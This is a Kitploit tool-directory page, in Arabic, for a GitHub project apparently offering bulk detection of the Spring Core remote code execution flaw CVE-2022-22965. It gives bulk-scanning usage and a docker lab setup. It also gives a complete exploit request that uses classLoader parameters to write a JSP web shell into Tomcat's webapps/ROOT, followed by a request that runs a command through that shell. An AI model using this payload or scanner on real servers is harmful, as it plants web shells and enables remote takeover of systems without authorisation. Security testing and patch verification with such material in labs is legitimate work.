Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22965-Spring-Core-Rce — كشف جماعي غير مدمر لثغرة CVE-2022-22965 | Kitploit
أدوات/GitHubGitHub/tangxiaofeng7/cve-2022-22965-spring-core-rce
ماسحات الثغرات الأمنيةأمن الحاوياتالتحليل الديناميكي (عزل)الاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubtangxiaofeng7/cve-2022-22965-spring-core-rce

CVE-2022-22965-Spring-Core-Rce

كشف جماعي غير مدمر لثغرة CVE-2022-22965

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3914منذ 4 سنواتتمت المراجعة من قبل Kitploit

Spring-Core JDK9+ RCE

تعليمات الاستخدام

root@kitploit:~
╰─ ./CVE-2022-22965 -h                                                                                                                                                                                                                                            ─╯
单个检测:./CVE-2022-22965 -u http://127.0.0.1:8080
批量检测:./CVE-2022-22965 -l url.txt 

الاختبار المحلي للثغرة

0x01 صورة docker
root@kitploit:~
 docker pull vulfocus/spring-core-rce-2022-03-29
 docker run -itd -p 8080:8080 -P vulfocus/spring-core-rce-2022-03-29

-it: تفعيل وضع الإدخال التفاعلي وربط الطرفية الزائفة -d: تشغيل الحاوية في الخلفية -p: تعيين المنفذ

0x02 حزمة war المحلية

ضع حزمة war في دليل webapps المحلي قم بتبديل jdk إلى الإصدار 9 أو أحدث، وهنا أستخدم jdk11، ثم شغّل tomcat. حقن EXP:

root@kitploit:~
POST / HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
suffix: %>
prefix: <%Runtime
Content-Type: application/x-www-form-urlencoded
Content-Length: 495

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di.getRuntime%28%29.exec%28request.getParameter%28%22cmd%22%29%29%3B%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell

تنفيذ الأمر:

root@kitploit:~
GET /shell.jsp?cmd=open%20/System/Applications/Calculator.app HTTP/1.1
Host: 127.0.0.1:8080

تنزيل الأداة